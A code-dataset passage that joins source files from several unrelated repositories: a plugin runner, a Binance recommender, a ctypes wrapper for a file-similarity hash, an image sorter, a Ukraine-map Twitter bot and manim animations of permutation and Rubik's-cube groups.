print('save screenshot at: {}'.format(down_screen_shot_path))
with open(down_screen_shot_path, 'w') as f:
f.write(pic_data)
hhd.update_rs_by_serial_id_screenshot(serial_id)
else:
print('{} not found screenshot'.format(serial_id))
# close session
hhd.close()
``` |
{
"source": "a232319779/mmpi",
"score": 2
} |
#### File: mmpi/core/plugins.py
```python
import os
import importlib
import logging
import mmpi
from mmpi.common.filetypes import get_support_file_type
from mmpi.common.exceptions import DependencyError, ProcessingError
log = logging.getLogger(__name__)
def enumerate_plugins(dirpath, module_prefix, namespace, class_,
attributes={}, as_dict=False):
"""Import plugins of type `class` located at `dirpath` into the
`namespace` that starts with `module_prefix`. If `dirpath` represents a
filepath then it is converted into its containing directory. The
`attributes` dictionary allows one to set extra fields for all imported
plugins. Using `as_dict` a dictionary based on the module name is
returned."""
if os.path.isfile(dirpath):
dirpath = os.path.dirname(dirpath)
for fname in os.listdir(dirpath):
if fname.endswith(".py") and not fname.startswith("__init__"):
module_name, _ = os.path.splitext(fname)
try:
importlib.import_module(
"%s.%s" % (module_prefix, module_name)
)
except ImportError as e:
raise ImportError(
"Unable to load theplugin at %s: %s. Please "
"review its contents and/or validity!" % (fname, e)
)
subclasses = class_.__subclasses__()[:]
plugins = []
while subclasses:
subclass = subclasses.pop(0)
# Include subclasses of this subclass (there are some subclasses, e.g.,
# LibVirtMachinery, that fail the fail the following module namespace
# check and as such we perform this logic here).
subclasses.extend(subclass.__subclasses__())
# Check whether this subclass belongs to the module namespace that
# we're currently importing. It should be noted that parent and child
# namespaces should fail the following if-statement.
if module_prefix != ".".join(subclass.__module__.split(".")[:-1]):
continue
namespace[subclass.__name__] = subclass
for key, value in attributes.items():
setattr(subclass, key, value)
plugins.append(subclass)
if as_dict:
ret = {}
for plugin in plugins:
ret[plugin.__module__.split(".")[-1]] = plugin
return ret
return sorted(plugins, key=lambda x: x.__name__.lower())
class RunProcessing(object):
"""Analysis Results Processing Engine.
This class handles the loading and execution of the processing modules.
It executes the enabled ones sequentially and generates a dictionary which
is then passed over the reporting engine.
"""
def __init__(self, data):
"""@param task: task dictionary of the analysis to process."""
self.file_type = get_support_file_type(data.get('file_type'))
self.file_content = data.get('content')
def process(self, module, results):
"""Run a processing module.
@param module: processing module to run.
@param results: results dict.
@return: results generated by module.
"""
if not module.enabled:
return None, None
# Initialize the specified processing module.
try:
current = module()
except:
log.warning(
"Failed to load the processing module: %s",
module, extra={"file_content": self.file_content}
)
return None, None
# Give it the path to the analysis results.
current.set_content(self.file_content)
current.set_type(self.file_type)
current.set_results(results)
try:
# Run the processing module and retrieve the generated data to be
# appended to the general results container.
data = current.run()
log.debug(
"Executed processing module \"%s\" for task #%s",
current.__class__.__name__, self.file_content
)
# If succeeded, return they module's key name and the data.
return current.key, data
except DependencyError as e:
log.warning(
"The processing module \"%s\" has missing dependencies: %s",
current.__class__.__name__, e
)
except ProcessingError as e:
log.warning(
"The processing module \"%s\" returned the following "
"error: %s",
current.__class__.__name__, e
)
except Exception as e:
log.warning(
"Failed to run the processing module \"%s\" for task #%s:",
current.__class__.__name__, self.file_content
)
return None, None
def run(self):
"""Run all processing modules and all signatures.
@return: processing results.
"""
# This is the results container. It's what will be used by all the
# reporting modules to make it consumable by humans and machines.
# It will contain all the results generated by every processing
# module available. Its structure can be observed through the JSON
# dump in the analysis' reports folder. (If jsondump is enabled.)
# We friendly call this "fat dict".
results = {
"_temp": {},
}
# Uses plain machine configuration as input.
# Order modules using the user-defined sequence number.
# If none is specified for the modules, they are selected in
# alphabetical order.
processing_list = mmpi.processing.plugins
# If no modules are loaded, return an empty dictionary.
if processing_list:
processing_list.sort(key=lambda module: module.order)
# Run every loaded processing module.
for module in processing_list:
key, result = self.process(module, results)
# If the module provided results, append it to the fat dict.
if key and result:
results['type'] = key
results['value'] = result
else:
log.info("No processing modules loaded")
results.pop("_temp", None)
# Return the fat dict.
return results
class RunSignatures(object):
"""Run Signatures."""
available_signatures = []
def __init__(self, results):
self.results = results
self.matched = []
# Initialize each applicable Signature.
self.signatures = []
for signature in self.available_signatures:
self.signatures.append(signature(self))
@classmethod
def init_once(cls):
cls.available_signatures = []
# Gather all enabled & up-to-date Signatures.
for signature in mmpi.signatures:
if cls.should_load_signature(signature):
cls.available_signatures.append(signature)
# Sort Signatures by their order.
cls.available_signatures.sort(key=lambda sig: sig.order)
@classmethod
def should_load_signature(cls, signature):
"""Should the given signature be enabled for this analysis?"""
if not signature.enabled or signature.name is None:
return False
if not cls.check_signature_version(signature):
return False
if hasattr(signature, "enable") and callable(signature.enable):
if not signature.enable():
return False
return True
@classmethod
def check_signature_version(cls, sig):
"""Check signature version.
@param sig: signature class/instance to check.
@return: check result.
"""
if hasattr(sig, "run"):
log.warning(
"This signatures features one or more deprecated functions "
"which indicates that it is very likely an old-style "
"signature. Please upgrade this signature: %s.", sig.name
)
return False
return True
def call_signature(self, signature, handler, *args, **kwargs):
"""Wrapper to call into 3rd party signatures. This wrapper yields the
event to the signature and handles matched signatures recursively."""
try:
if not signature.matched and handler(*args, **kwargs):
signature.matched = True
for sig in self.signatures:
self.call_signature(sig, sig.on_signature, signature)
except NotImplementedError:
return False
except:
log.warning(
"Failed to run '%s' of the %s signature",
handler.__name__, signature.name
)
return True
def run(self):
"""Run signatures."""
# Allow signatures to initialize themselves.
for signature in self.signatures:
signature.init()
log.debug("Running %d signatures", len(self.signatures))
# Yield completion events to each signature.
for sig in self.signatures:
self.call_signature(sig, sig.on_complete)
score, configs = 0, []
for signature in self.signatures:
if not signature.matched:
continue
log.debug(
"matched signature: %s", signature.name, extra={
"action": "signature.match", "status": "success",
"signature": signature.name,
"severity": signature.severity,
}
)
self.matched.append(signature.results())
score += signature.severity
# Sort the matched signatures by their severity level and put them
# into the results dictionary.
self.matched.sort(key=lambda key: key["severity"])
self.results.append({"type": "signatures", "value": {
"infos": self.matched, "datas": list()}})
```
#### File: mmpi/core/startup.py
```python
import logging
import mmpi
from mmpi.core.plugins import RunSignatures
log = logging.getLogger(__name__)
def init_modules():
"""Initializes plugins."""
log.debug("Imported modules...")
# categories = (
# "processing", "signatures"
# )
categories = (
"processing",
)
# Call the init_once() static method of each plugin/module. If an exception
# is thrown in that initialization call, then a hard error is appropriate.
for category in categories:
for module in mmpi.plugins[category]:
if module.enabled:
module.init_once()
for category in categories:
log.debug("Imported \"%s\" modules:", category)
entries = mmpi.plugins[category]
for entry in entries:
if entry == entries[-1]:
log.debug("\t `-- %s", entry.__name__)
else:
log.debug("\t |-- %s", entry.__name__)
RunSignatures.init_once()
``` |
{
"source": "a232319779/nextb",
"score": 2
} |
#### File: nextb/tools/recommend.py
```python
import datetime
from nextb.libs.utils.parsecmd import nextb_cmd_parse
from nextb.libs.utils.parseini import NextBParseINI
from nextb.libs.platform.nextbbinance import NextBBiance
from nextb.libs.robot.leekrobot0 import analysis
from nextb.libs.db.nextbDB import NextBDB
def main():
cmd_args = nextb_cmd_parse()
robot_name = cmd_args.name
config_path = cmd_args.config
nbpi = NextBParseINI(config_path)
robot_config = nbpi.get_robot_config(robot_name)
proxies = {
"http": robot_config.get("http_proxy", ''),
"https": robot_config.get("https_proxy", '')
}
api_key = robot_config.get("api_key")
api_secret = robot_config.get("api_secret")
interval = robot_config.get("klines_interval")
nbb = NextBBiance(
api_key=api_key, api_secret=api_secret, proxies=proxies, increasing=True
)
datas = nbb.get_binance_klines_datas_inc(interval=interval, limit=2)
choose_list = analysis(datas)
if cmd_args.db:
db = NextBDB()
recommond_data = {'robot_name': 'LeekRobot0', 'symbols': '', 'time': datetime.datetime.now()}
symbols = ','.join([cl.get('symbol','ddvv') for cl in choose_list])
recommond_data['symbols'] = symbols
if symbols:
recommond_data['count'] = symbols.count(',') + 1
else:
recommond_data['count'] = 0
db.add_data(recommond_data)
if __name__ == "__main__":
main()
``` |
{
"source": "a232319779/python_mmdt",
"score": 2
} |
#### File: python_mmdt/mmdt/mmdt.py
```python
import os
import platform
import numpy as np
from ctypes import *
from python_mmdt.mmdt.common import mmdt_load,mmdt_std
SYSTEM_VER = platform.system().lower()
ENGINE_SUFFIX = {
"windows": "dll",
"darwin": "dylib",
"linux": "so"
}
class MMDT_Data(Structure):
_fields_ = [
("index_value", c_uint32),
("main_value1", c_uint32),
("main_value2", c_uint32),
("main_value3", c_uint32),
("main_value4", c_uint32),
]
class MMDT(object):
def __init__(self):
cwd = os.path.abspath(os.path.dirname(__file__))
lib_core_path = os.path.join(cwd, "libcore.{}".format(ENGINE_SUFFIX[SYSTEM_VER]))
mmdt_feature_file_name = os.path.join(cwd, "mmdt_feature.data")
mmdt_feature_label_file_name = os.path.join(cwd, "mmdt_feature.label")
self.datas = list()
self.labels = list()
self.build_datas = None
self.build_labels = None
if not os.path.exists(lib_core_path):
raise Exception(lib_core_path)
if os.path.exists(mmdt_feature_file_name):
self.datas = mmdt_load(mmdt_feature_file_name)
if os.path.exists(mmdt_feature_label_file_name):
self.labels = mmdt_load(mmdt_feature_label_file_name)
api = CDLL(lib_core_path)
self.py_mmdt_hash = api.mmdt_hash
self.py_mmdt_hash.argtypes = [c_char_p, POINTER(MMDT_Data)]
self.py_mmdt_hash.restype = c_int
self.py_mmdt_compare = api.mmdt_compare
self.py_mmdt_compare.argtypes = [c_char_p, c_char_p]
self.py_mmdt_compare.restype = c_double
self.py_mmdt_hash_streaming = api.mmdt_hash_streaming
self.py_mmdt_hash_streaming.argtypes = [c_char_p, c_uint32, POINTER(MMDT_Data)]
self.py_mmdt_hash_streaming.restype = c_int
self.py_mmdt_compare_hash = api.mmdt_compare_hash
self.py_mmdt_compare_hash.argtypes = [MMDT_Data, MMDT_Data]
self.py_mmdt_compare_hash.restype = c_double
@staticmethod
def __str_to_mmdt__(md_str):
md = MMDT_Data()
tmp = md_str.split(':')
md.index_value = int(tmp[0], 16)
md.main_value1 = int(tmp[1][:8], 16)
md.main_value2 = int(tmp[1][8:16], 16)
md.main_value3 = int(tmp[1][16:24], 16)
md.main_value4 = int(tmp[1][24:32], 16)
return md
@staticmethod
def __mmdt_to_str__(md):
md_str = "%08X:%08X%08X%08X%08X" % (md.index_value, md.main_value1, md.main_value2, md.main_value3, md.main_value4)
return md_str
def mmdt_hash(self, filename):
lp_filename = c_char_p(filename.encode())
md = MMDT_Data()
if not self.py_mmdt_hash(lp_filename, byref(md)):
return self.__mmdt_to_str__(md)
return None
def mmdt_compare(self, filename1, filename2):
lp_filename1 = c_char_p(filename1.encode())
lp_filename2 = c_char_p(filename2.encode())
sim = 0.0
sim = self.py_mmdt_compare(lp_filename1, lp_filename2)
return sim
def mmdt_hash_streaming(self, filename):
with open(filename, 'rb') as f:
data = f.read()
md = MMDT_Data()
if not self.py_mmdt_hash_streaming(c_char_p(data), len(data), byref(md)):
return self.__mmdt_to_str__(md)
return None
def mmdt_compare_hash(self, md1_str, md2_str):
md1 = self.__str_to_mmdt__(md1_str)
md2 = self.__str_to_mmdt__(md2_str)
sim = 0.0
sim = self.py_mmdt_compare_hash(md1, md2)
return sim
def build_features(self, classify_type=1):
if classify_type == 1:
self.build_datas = self.gen_simple_features()
elif classify_type == 2:
self.build_datas, self.build_labels = self.gen_knn_features()
def gen_simple_features(self):
datas = {}
for data in self.datas:
tmp = data.split(':')
index_value = int(tmp[0], 16)
if index_value not in datas.keys():
datas[index_value] = [('%s:%s' % (tmp[0], tmp[1]), int(tmp[2],10))]
else:
datas[index_value].append(('%s:%s' % (tmp[0], tmp[1]), int(tmp[2],10)))
return datas
def simple_classify(self, md, dlt):
datas = self.build_datas
index_value = int(md.split(':')[0], 16)
match_datas = datas.get(index_value, [])
for match_data in match_datas:
sim = self.mmdt_compare_hash(md, match_data[0])
if sim > dlt:
label_index = match_data[1]
if self.labels:
label = self.labels[label_index]
else:
label = 'match_%d' % label_index
return sim, label
return 0.0, 'unknown'
def gen_knn_features(self):
data_list = []
label_list = []
for data in self.datas:
tmp = data.split(':')
main_hash = tmp[1]
main_values = []
for i in range(0, len(main_hash), 2):
main_values.append(int(main_hash[i:i+2], 16))
data_list.append(main_values)
label_list.append(int(tmp[2]))
return data_list, label_list
def knn_classify(self, md, dlt):
def gen_knn_data(data):
tmp = data.split(':')
main_hash = tmp[1]
main_values = []
for i in range(0, len(main_hash), 2):
main_values.append(int(main_hash[i:i+2], 16))
return main_values
datas = self.build_datas
labels = self.build_labels
train_datas = np.array(datas)
t_data = gen_knn_data(md)
rowSize = train_datas.shape[0]
diff = np.tile(t_data, (rowSize, 1)) - train_datas
sqr_diff = diff ** 2
sqr_diff_sum = sqr_diff.sum(axis=1)
distances = sqr_diff_sum ** 0.5
sort_distance = distances.argsort()
matched = sort_distance[0]
label_index = labels[matched]
sim = 1.0 - distances[matched]/1020.0
if sim > dlt:
if self.labels:
label = self.labels[label_index]
else:
label = 'match_%d' % label_index
return sim, label
return 0.0, 'unknown'
def classify(self, filename, dlt, classify_type=1):
md = self.mmdt_hash(filename)
if md:
arr_std = mmdt_std(md)
if classify_type == 1:
sim, label = self.simple_classify(md, dlt)
elif classify_type == 2:
sim, label = self.knn_classify(md, dlt)
else:
sim = 0.0
label = 'unknown'
print('%s,%f,%s,%f' % (filename, sim, label, arr_std))
else:
print('%s mmdt_hash is None' % filename)
``` |
{
"source": "a23956491z/imageSorter",
"score": 3
} |
#### File: a23956491z/imageSorter/fs.py
```python
import os
from PIL import Image, ImageTk
import inspect
import re
import shutil
class picture:
def __init__(self, path):
self.image = Image.open(path)
tempWidth, tempHeight = self.image.size
self.ratio = tempHeight / float(tempWidth)
def resize(self, width, height, lockmode = None):
if lockmode == "height":
new_width = height / self.ratio
self.image = self.image.resize((int(new_width), height), Image.BILINEAR)
elif lockmode == "width":
new_height = self.ratio * width
self.image = self.image.resize((width, int(new_height)), Image.BILINEAR)
elif lockmode == None:
self.image = self.image.resize((height, width), Image.BILINEAR)
def get_tk(self):
return ImageTk.PhotoImage(self.image)
def get_size(self):
return self.image.size
class filesystem:
def __init__(self, path, filenameExten = None, fulldirlist = None):
self.path = path
self.fne = filenameExten
self.filelist = [f for f in os.listdir(path) if
os.path.isfile(os.path.join(path, f))]
if fulldirlist == None:
self.subdir = [f for f in os.listdir(path) if
os.path.isdir(os.path.join(path, f))
]
self.fulldir = [self.get_dirpath(i) for i in range(len(self.subdir))]
else:
self.fulldir = fulldirlist
print (self.fulldir[0])
forre = ".+/(.+)$"
self.subdir = [(re.match(forre ,self.fulldir[i])).group(1) for i
in range(len(self.fulldir))]
if self.fne != None:
forRe = ".*\." + self.fne + "$" # like".*\.py$"
self.filelist = [f for f in self.filelist if
re.match(forRe, f) ]
def moveFile(self, fileIndex, dirIndex):
if not(self.file_empty()):
oldfile = self.path + "/" + self.filelist[fileIndex]
newfile = self.fulldir[dirIndex] + "/" + self.filelist[fileIndex]
shutil.move(oldfile, newfile)
def get_filepath(self, fileIndex):
if(len(self.filelist)==0):
return None
else:
return self.path + "/" + self.filelist[fileIndex]
# It's function have some problem
def get_dirpath(self, dirIndex):
if(len(self.subdir)==0):
return None
else:
return self.path + "/" + self.subdir[dirIndex]
def refresh(self, dirlist = None):
self.filelist = [f for f in os.listdir(self.path) if
os.path.isfile(os.path.join(self.path, f))]
if self.fne != None:
forRe = ".*\." + self.fne + "$" # like".*\.py$"
self.filelist = [f for f in self.filelist if
re.match(forRe, f) ]
if dirlist != None:
self.fulldir = dirlist
forre = ".+/(.+)$"
self.subdir = [re.match(forre ,self.fulldir[i]).group(1)
for i in range(len(self.fulldir))
if re.match(forre, self.fulldir[i])]
def file_empty(self):
return not(bool(len(self.filelist)))
# if __name__ == "__main__":
# path = "C:/Users/a2395/Desktop/fortest"
# fulldir = ["C:/Users/a2395/Desktop/fortest/1" ,
# "C:/Users/a2395/Desktop/fortest/2","C:/Users/a2395/Desktop/fortest/3"]
# fs = filesystem(path = path, filenameExten = "txt", fulldirlist = fulldir)
# print(fs.subdir)
``` |
{
"source": "a2435191/ukraine-war-map-twitter-bot",
"score": 3
} |
#### File: ukraine_war_map_twitter_bot/logs/log.py
```python
import functools
import logging
from typing import Any, Callable, Dict, List, ParamSpec, TypeVar
from ..constants import LOGS_RELATIVE_PATH
class CustomFormatter(logging.Formatter):
_FORMATTER_WITH_FUNC_NAME = logging.Formatter(
"%(asctime)s %(levelname)s at %(funcName)s in %(module)s (%(lineno)d): %(message)s"
)
_FORMATTER_WOUT_FUNC_NAME = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
def usesTime(self):
return True
def formatMessage(self, record):
if record.funcName == "wrapper":
return self._FORMATTER_WOUT_FUNC_NAME.formatMessage(record)
else:
return self._FORMATTER_WITH_FUNC_NAME.formatMessage(record)
def get_logger(name: str) -> logging.Logger:
console_handler = logging.StreamHandler()
file_handler = logging.FileHandler(LOGS_RELATIVE_PATH)
console_handler.setLevel(logging.DEBUG)
file_handler.setLevel(logging.DEBUG)
formatter = CustomFormatter()
console_handler.setFormatter(formatter)
file_handler.setFormatter(formatter)
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
logger.addHandler(console_handler)
logger.addHandler(file_handler)
return logger
def log_fn_enter_and_exit(logger: logging.Logger, log_exit: bool = False):
ParamTypes = ParamSpec("ParamTypes")
ReturnType = TypeVar("ReturnType")
def deco(fn: Callable[ParamTypes, ReturnType]):
@functools.wraps(fn)
def wrapper(*args: ParamTypes.args, **kwargs: ParamTypes.kwargs) -> ReturnType:
args_shortened: List[str] = [str(arg)[:100] for arg in args]
kwargs_shortened: Dict[str, str] = {str(k)[:100]: str(v)[:100] for k, v in kwargs.items()}
logger.debug(f"Entered {fn.__name__} with args {args_shortened} and kwargs {kwargs_shortened}")
result = fn(*args, **kwargs)
if log_exit:
logger.debug(
f"Exited {fn.__name__} with args {args} and kwargs {kwargs}"
)
return result
return wrapper
return deco
```
#### File: src/ukraine_war_map_twitter_bot/main.py
```python
import json
from datetime import datetime
from typing import Any, Callable, Dict, ParamSpec, TypeVar
import tweepy
from .analyze import get_areas
from .constants import DESCRIPTION_PREFIX, DESCRIPTION_SUFFIX, URL
from .logs.log import get_logger, log_fn_enter_and_exit
from .utils import (
get_filename,
get_permanent_data,
get_png,
get_svg_data,
split_tweet,
update_permanent_data,
)
from .wikimedia_download import get_latest_ukraine_map
LOGGER = get_logger(__name__)
class UkraineBot:
@log_fn_enter_and_exit(LOGGER)
def __init__(self, permanent_data_path: str, twitter_secrets_path: str) -> None:
self._data_path = permanent_data_path
self._auth_path = twitter_secrets_path
self._api = self._auth_and_get_api()
_ParamTypes = ParamSpec("_ParamTypes")
_ReturnType = TypeVar("_ReturnType")
@log_fn_enter_and_exit(LOGGER)
def _auth_and_get_api(self) -> tweepy.API:
with open(self._auth_path) as fh:
secrets: Dict[str, Any] = json.load(fh)
auth = tweepy.OAuth1UserHandler(**secrets)
return tweepy.API(auth)
@log_fn_enter_and_exit(LOGGER)
def post(self) -> None:
try:
latest_data = get_latest_ukraine_map()
LOGGER.debug(f"latest ukraine map: {latest_data}")
permanent_data = get_permanent_data(self._data_path)
old_timestamp = permanent_data["latest_timestamp"]
old_ua_land_pct = permanent_data[
"latest_land_controlled_by_ukraine_percent"
]
LOGGER.debug(f"permanent_data: {permanent_data}")
if latest_data.timestamp <= old_timestamp:
LOGGER.info(
f"latest timestamp ({latest_data.timestamp}) is not "
+ f"newer than timestamp in {self._auth_path} ({old_timestamp})"
)
return
LOGGER.info(
f"latest timestamp ({latest_data.timestamp}) is "
+ f"newer than timestamp in {self._data_path} ({old_timestamp})"
)
filename = get_filename(latest_data.timestamp)
LOGGER.debug(f"filename: {filename}")
svg_data = get_svg_data(latest_data.svg_url)
file_ = get_png(svg_data)
media: tweepy.Media = self._api.media_upload(filename, file=file_)
LOGGER.debug(f"media: {media}")
description_chunks = split_tweet(
f"Link: {URL}\n\nDescription: " + latest_data.description
)
LOGGER.debug(f"description_chunks: {description_chunks}")
try:
ru_land, ua_land = get_areas(svg_data.decode("utf-8"))
except Exception as e:
LOGGER.warning("could not get areas due to exception: " + str(e))
land_control_str = ""
ua_land_pct = old_ua_land_pct
else:
ua_land_pct = ua_land / (ua_land + ru_land) * 100
land_control_str = f"Ukraine controls {round(ua_land_pct, 3)}% relative to the invasion's start"
if old_ua_land_pct is not None:
delta = round(ua_land_pct - old_ua_land_pct, 3)
if delta >= 0:
delta_string = f"🟢 +{delta}%"
else:
delta_string = f"🔴 {delta}%"
land_control_str += f" ({delta_string})\n"
LOGGER.debug(
f"ua_land: {ua_land}, ru_land: {ru_land}, ua_land_pct: {ua_land_pct}"
)
try:
tweet = self._api.update_status(
f"{DESCRIPTION_PREFIX} ({datetime.fromtimestamp(latest_data.timestamp)} UTC)\n"
+ land_control_str \
+ DESCRIPTION_SUFFIX,
media_ids=[media.media_id],
)
LOGGER.debug(
f"tweet at https://twitter.com/ua_invasion_bot/status/{tweet.id}"
)
target_id: int = tweet.id
for chunk in description_chunks:
LOGGER.info(f"making reply tweet for {chunk}")
comment_tweet = self._api.update_status(
chunk, in_reply_to_status_id=target_id
)
target_id = comment_tweet.id
finally:
update_permanent_data(
self._data_path,
{
"latest_timestamp": latest_data.timestamp,
"latest_land_controlled_by_ukraine_percent": ua_land_pct,
},
)
except Exception as e:
LOGGER.error(e, exc_info=True)
raise e
``` |
{
"source": "a2435191/umtymp-at-group-project",
"score": 3
} |
#### File: manim/definition_and_notation/permutation_definition.py
```python
from manim import *
from numpy import array
from copy import deepcopy
class ArrayDefinition(Scene):
"""In the style of arraynotation.py
"""
def construct(self):
BRACKET_SIZE = 160
CIRCLE_COLORS = ['#0000FF', '#FF0000', '#FFFF00']
POSITIONS = [3 * LEFT, 0, 3 * RIGHT]
set_label = Tex(r"$A\!=$", font_size=BRACKET_SIZE).shift(3 * LEFT + 0.8 * RIGHT)
left_bracket = Tex(r"\{", font_size=BRACKET_SIZE).shift(1.0 * LEFT + 0.8 * RIGHT)
right_bracket = Tex(r"\}", font_size=BRACKET_SIZE).shift(1.0 * RIGHT + 0.8 * RIGHT)
self.play(
Write(left_bracket),
Write(set_label),
Write(right_bracket)
)
self.play(
left_bracket.animate.shift(3 * LEFT),
set_label.animate.shift(3 * LEFT),
right_bracket.animate.shift(3 * RIGHT)
)
circles = VGroup(*[Circle(0.8, color, fill_opacity=0.75).shift(pos + 0.8 * RIGHT)
for color, pos in zip(CIRCLE_COLORS, POSITIONS)])
self.play(Create(circles))
upper = VGroup(*circles, left_bracket, right_bracket)
lower = upper.copy()
upper.add(set_label)
function_label = Tex(r"\underline{$f: A \rightarrow A$}").shift(5 * LEFT)
self.play(upper.animate.shift(UP * 2), lower.animate.shift(DOWN * 2))
self.play(Write(function_label))
mapping = {0: 1, 2: 0, 1: 2}
for i, (top_index, btm_index) in enumerate(mapping.items()):
upper_circle = upper[top_index]
lower_circle = lower[btm_index]
arrow = Arrow(upper_circle, lower_circle)
function_text_opener = Tex(r"$f($").shift(DOWN * 0.7 * (i + 1), LEFT * 5.9)
function_input = upper_circle.copy().scale(0.2 / 100).move_to(function_text_opener).shift(0.4 * RIGHT)
function_text_middle = Tex(r"$) = $").shift(DOWN * 0.7 * (i + 1) , LEFT * 5)
function_output = lower_circle.copy().scale(0.2 / 100).move_to(function_text_middle).shift(0.6 * RIGHT)
function_text = VGroup(function_text_opener, function_text_middle)
self.play(AnimationGroup(
Create(arrow),
Write(function_text),
ScaleInPlace(function_input, 100),
ScaleInPlace(function_output, 100)
))
self.wait()
class CycleDefinition(Scene):
"""In the style of cyclenotation.py
Maybe unused?
"""
def construct(self):
r = 0.5
michael = Circle(radius=r, color='#0000FF', fill_color='#0000FF', fill_opacity=0.75)
pramod = Circle(radius=r, color='#FF0000', fill_color='#FF0000', fill_opacity=0.75)
will = Circle(radius=r, color='#FFFF00', fill_color='#FFFF00', fill_opacity=0.75)
michael.move_to(array([-2, 0, 0]))
will.move_to(array([2, 0, 0]))
arr = [michael, pramod, will]
ref_arr = deepcopy(arr)
pos = [array([-2, 0, 0]), array([0, 0, 0]), array([2, 0, 0])]
right = [Arc(radius=1, start_angle=PI, angle=PI).shift(array([1, 0, 0])),
Arc(radius=1, start_angle=0, angle=PI).shift(array([1, 0, 0]))]
left = [Arc(radius=1, start_angle=PI, angle=-PI).shift(array([-1, 0, 0])),
Arc(radius=1, start_angle=0, angle=-PI).shift(array([-1, 0, 0]))]
self.play(
*[Create(obj) for obj in arr]
)
self.play(
MoveAlongPath(arr[1], right[0]),
MoveAlongPath(arr[2], right[1])
)
self.play(
MoveAlongPath(arr[0], left[0]),
MoveAlongPath(arr[2], left[1])
)
self.play(
MoveAlongPath(arr[0], right[0]),
MoveAlongPath(arr[1], right[1])
)
self.play(
MoveAlongPath(arr[2], left[0]),
MoveAlongPath(arr[1], left[1])
)
self.play(
MoveAlongPath(arr[2], right[0]),
MoveAlongPath(arr[0], right[1])
)
self.play(
MoveAlongPath(arr[1], left[0]),
MoveAlongPath(arr[0], left[1])
)
```
#### File: manim/examples/permutation_group_definition.py
```python
from manim import *
from util_write_group_defs import write_group_defs
class PermutationGroupDefinition(Scene):
def construct(self):
matrix_one = r"""\begin{bmatrix}
1 & 2 & 3 \\
1 & 2 & 3
\end{bmatrix}"""
matrix_two = r"""\begin{bmatrix}
1 & 2 & 3 \\
1 & 3 & 2
\end{bmatrix}"""
matrix_three = r"""\begin{bmatrix}
1 & 2 & 3 \\
2 & 1 & 3
\end{bmatrix}"""
template = TexTemplate()
template.add_to_preamble(r"\usepackage{amsmath}")
write_group_defs(self, "Permutation Group", "G",
[matrix_one, matrix_two, matrix_three], r"\circ", 72, 50, tex_template=template)
```
#### File: manim/examples/rubiks_cube_group.py
```python
from cmath import isclose
from ctypes import cast
from manim import *
from manim_rubikscube import *
from permutation_group_definition import write_group_defs
import numpy as np
class RubiksCubeGroup(Scene):
def construct(self):
title = Tex(r"\underline{Rubik's cube group}", font_size=72).shift(UP * 2)
set_def = MathTex(r"S", r"= \{F, B, U, L, D, R\}", font_size=64).next_to(title, DOWN)
grp_def = MathTex(r"R_3 = \langle S, \circ \rangle",
substrings_to_isolate=[r'S', r'\circ'], font_size=64)\
.set_color_by_tex_to_color_map({r'S': RED, r'\circ': BLUE})\
.next_to(set_def, DOWN)
self.play(Write(title), Write(set_def), Write(grp_def))
self.wait(2)
self.play(Unwrite(title), Unwrite(set_def), Unwrite(grp_def))
self.wait()
class DefineElements(ThreeDScene):
def construct(self):
cube = RubiksCube().scale(0.5).shift(IN)
self.move_camera(phi=60 * DEGREES, theta = 45 * DEGREES)
for cubie in cube.cubies.flatten():
cubie: Cubie = cubie
cubie.set_opacity(1.0)
self.play(FadeIn(cube))
actual_rubix_cube_center = VGroup(*cube.get_face("L"), *cube.get_face("R")).get_center()
print(actual_rubix_cube_center)
for axis in "FBUDLR":
face = VGroup(*cube.get_face(axis))
center = face.get_center() - actual_rubix_cube_center
print("center", center)
outwards_vector_normalized = center / np.sqrt(np.sum(center**2))
arc = Arc(1.5, 0, 0.8 * TAU, color=GRAY)\
.center()\
.add_tip(tip_length=0.3)\
.add_tip(at_start=True, tip_length=0.3)\
.set_shade_in_3d()
closeness = np.dot(arc.normal_vector, outwards_vector_normalized)
if not isclose(abs(closeness), 1.0, abs_tol=0.01): # to avoid rotating around <0, 0, 0>
rotate_around = np.cross(arc.normal_vector, outwards_vector_normalized)
print(arc.normal_vector, outwards_vector_normalized, rotate_around)
arc.rotate_about_origin(PI / 2, rotate_around)
print(arc.normal_vector)
arc.center()
arc.shift(actual_rubix_cube_center + outwards_vector_normalized * 2.5)
print("arc center", arc.get_arc_center())
print("target", actual_rubix_cube_center + outwards_vector_normalized * 2.5)
tex = Tex(
f"${axis}$ ",
"(CW)\n\n",
f"${axis}'$ ",
"(CCW)", font_size=56)\
.set_color_by_tex(axis, RED)\
.shift(2.7 * UP, 4.5 * RIGHT)
self.add_fixed_in_frame_mobjects(tex)
self.add_fixed_orientation_mobjects(tex)
self.play(
AnimationGroup(
Write(arc),
FadeIn(tex),
CubeMove(cube, axis)
)
)
self.wait(0.5)
self.play(
AnimationGroup(
CubeMove(cube, axis + "'"),
FadeOut(tex),
Unwrite(arc)
)
)
self.play(FadeOut(cube))
self.wait(0.5)
```
#### File: manim/examples/util_write_group_defs.py
```python
from manim import *
from typing import List
def write_group_defs(self: Scene, title_str: str, group_name_str: str,
elements: List[str], operator_str: str, ellipsis: bool = False,
title_font_size: int = 72, math_font_size: int = 64,
read_time: float = 2.0, after_erase_time: float = 0.5,
*args, **kwargs) -> None:
elements_with_commas: List[str] = []
for elem in elements:
elements_with_commas.append(",")
elements_with_commas.append(elem)
elements_with_commas = elements_with_commas[1:]
if ellipsis:
elements_with_commas.insert(-1, r"\cdots")
title = Tex(r"\underline{" + title_str + r"}", font_size=title_font_size).shift(UP * 2)
math = MathTex(
group_name_str,
r" = \left(\left\{",
*elements_with_commas,
r"\right\}, ",
operator_str,
r"\right)",
font_size=math_font_size,
*args, **kwargs
)
if ellipsis:
red_color_range = math[2:-5:2]
red_color_range.add(math[-4])
else:
red_color_range = math[2:-3:2]
for elem in red_color_range:
elem.set_color(RED)
math[-2].set_color(BLUE)
self.play(Write(title), Write(math))
self.wait(read_time)
self.play(Unwrite(title), Unwrite(math))
self.wait(after_erase_time)
```
#### File: manim/properties_and_theorems/cayley.py
```python
from manim import *
import numpy as np
from numpy import array
from copy import deepcopy
import math
class Cayley1(Scene):
def construct(self):
G = MathTex(r'G').scale(2)
group_def = MathTex(r'G = \left(', r'\{g_1, g_2, ...\}', r',', r'*', r'\right)').scale(2)
self.play(
Write(G)
)
self.wait(2)
self.play(
ReplacementTransform(G, group_def)
)
self.wait(2)
group_def.generate_target()
group_def.target.scale(0.5)
group_def.target.move_to(UP*3 + LEFT*4)
self.play(
